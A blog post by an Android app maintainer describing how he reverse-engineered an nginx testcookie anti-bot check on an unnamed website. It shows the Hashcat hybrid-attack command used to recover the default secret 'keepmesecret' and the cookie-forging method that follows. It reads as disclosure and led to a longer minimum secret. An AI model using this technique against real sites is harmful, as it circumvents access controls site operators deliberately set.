A few days ago, I noticed that ApkTrack (an Android app I maintain) could no longer query one of the websites it usually obtains data from. The app works mostly through web scraping and once in a while, the target websites set up new countermeasures to prevent bots from accessing their contents (even innocuous bots such as this app). In this post, we'll see how the protection I encountered this week-end was bypassed.
It all began when I noticed that a website (whose identity will not be disclosed) returned the following script in lieu of the expected data:
It's plain to see that this script uses a slow AES implementation to generate a cookie required to browse the target website. I notice that the
c variables of the above script change with every try, and while they kind of look like MD5 hashes, none of them can be reversed easily. Time to dig in.
Ideally, I'd like to read the code which generates these values. I'm in luck: a quick search points me to an nginx module called testcookie.
Reading through the 2000-something lines of code is made difficult by the numerous macros coming from nginx, but I understand the following:
bare the key and initialization vector (respectively) used for the AES-CBC computation ;
cis the data to decipher.
- The latter is generated the following way:
c = AES(MD5($testcookie_session + $testcookie_secret)), those two variables being defined in the nginx configuration. More precisely:
- According to the documentation,
testcookie_sessioncan either be the visitor's IP address (i.e.
127.0.0.1), or their IP concatenated with the browser's user-agent (i.e.
127.0.0.1Mozilla/5.0 (X11; Ubuntu; Linux x86_64; [...]). This part is predictable and can be generated easily.
testcookie_secrethowever is an unknown value. It can be fixed, or random (in which case it changes every time the web server is rebooted).
- According to the documentation,
testcookie_session is generated on the target website, since it is configuration-dependant. That part is easy: I take another browser, navigate to the website and compare the cookies: they're identical. This means that only the IP address is used<; Next, I have to guess
testcookie_secret's value. We face the following equation:
- I know a valid cookie just by visiting the website:
- My IP address at the time was
- We have established that
64534e58cbc178830089d06de12c00ed = MD5("18.104.22.168" + testcookie_secret).
This is a textbook bruteforce situation. I fireup Hashcat:
PS C:\Users\Ivan\oclHashcat-1.33> .\oclHashcat64.exe -m0 .\targets\site.txt -a7 22.214.171.124 .\dicts\wordlist.txt oclHashcat v1.33 starting... [...] 64534e58cbc178830089d06de12c00ed:126.96.36.199keepmesecret
a7 option corresponds to a hybrid attack, which means that every word from the dictionary is prefixed with an arbitrary string (here, my IP address). After a while, Hashcat proudly announces the result:
testcookie_secret = keepmesecret. I actually guessed that value before the bruteforce had ended for a simple reason:
keepmesecret is the example value given in the documentation and I had tested it manually. When in doubt, always assume the sysadmin was lazy.
We now have everything needed to forge our cookies, and computing a MD5 hash before each request is all it takes to bypass the protection.
EDIT : Following this post,
testcookie_secret's minimum size has been increased to 32 characters in the latest version of the script.